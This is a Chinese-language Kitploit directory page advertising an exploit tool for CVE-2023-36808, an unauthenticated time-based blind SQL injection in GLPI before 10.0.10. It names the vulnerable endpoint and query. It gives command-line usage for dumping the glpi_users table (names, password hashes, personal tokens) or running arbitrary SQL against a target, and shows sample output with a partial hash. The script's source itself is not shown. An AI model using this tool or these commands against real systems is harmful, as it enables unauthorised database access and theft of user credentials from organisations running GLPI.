Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
exploit-cve-2023-36808 — 针对CVE-2023-36808的基于时间的盲SQL注入漏洞利用,适用于GLPI < 10.0.10。通过未经认证的XML清单端点,使用二分搜索优化提取用户凭据和数据库内容。 | Kitploit
工具/GitHubGitHub/fransosiche/exploit-cve-2023-36808
漏洞分析漏洞利用Web应用程序漏洞利用信息收集渗透测试
GitHubfransosiche/exploit-cve-2023-36808

exploit-cve-2023-36808

针对CVE-2023-36808的基于时间的盲SQL注入漏洞利用,适用于GLPI < 10.0.10。通过未经认证的XML清单端点,使用二分搜索优化提取用户凭据和数据库内容。

查看仓库

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
13个月前尚未审核
分享

CVE-2023-36808 - GLPI 未认证 SQL 注入

漏洞

GLPI 版本 < 10.0.10 暴露了一个未认证的 XML 资产清单端点:/front/inventory.php。
<deviceid> 字段未经清理直接拼接到 SQL 查询中:

root@kitploit:~
SELECT id FROM glpi_agents WHERE deviceid = '<INJECT>'

无需认证即可利用。该漏洞允许通过盲 SQL 注入获得完整的数据库读取权限。

漏洞利用

此脚本使用基于时间的盲注入结合二分搜索来提取数据,速度明显快于通用工具。

  • 每次布尔检查使用一次 SLEEP(无论表大小如何均可靠)
  • 二分搜索:每字符约 7 个请求,而不是 95 个
  • 字段级并行:每个用户的 name、password 和 token 同时提取
  • 并发上限防止并行请求之间的计时干扰

依赖

root@kitploit:~
pip install -r requirements.txt

用法

root@kitploit:~
# Dump the full glpi_users table (name, password hash, personal_token)
python3 exploit.py http://<TARGET>/glpi

# Custom SQL query
python3 exploit.py http://<TARGET>/glpi --query "SELECT @@version"

# Tune timing (lower sleep = faster, increase if you get wrong results)
python3 exploit.py http://<TARGET>/glpi --sleep 0.3

# Increase parallel request cap (default 2, raise on high-latency remote targets)
python3 exploit.py http://<TARGET>/glpi --parallel 4

示例输出

root@kitploit:~
[*] CVE-2023-36808 - GLPI Unauthenticated SQLi
[*] Target : http://10.0.0.1/glpi/front/inventory.php
[*] Sleep  : 0.5s  Threshold: 0.35s  Parallel: 2

[+] Target reachable
[+] Injection confirmed

[*] User 1/7
  name               glpi
  password           $2y$10$xN.12pQxSLlQdMJzP26EWe...
  personal_token     xxxx
...

参考

  • NVD - CVE-2023-36808
  • GLPI 安全公告
下载工具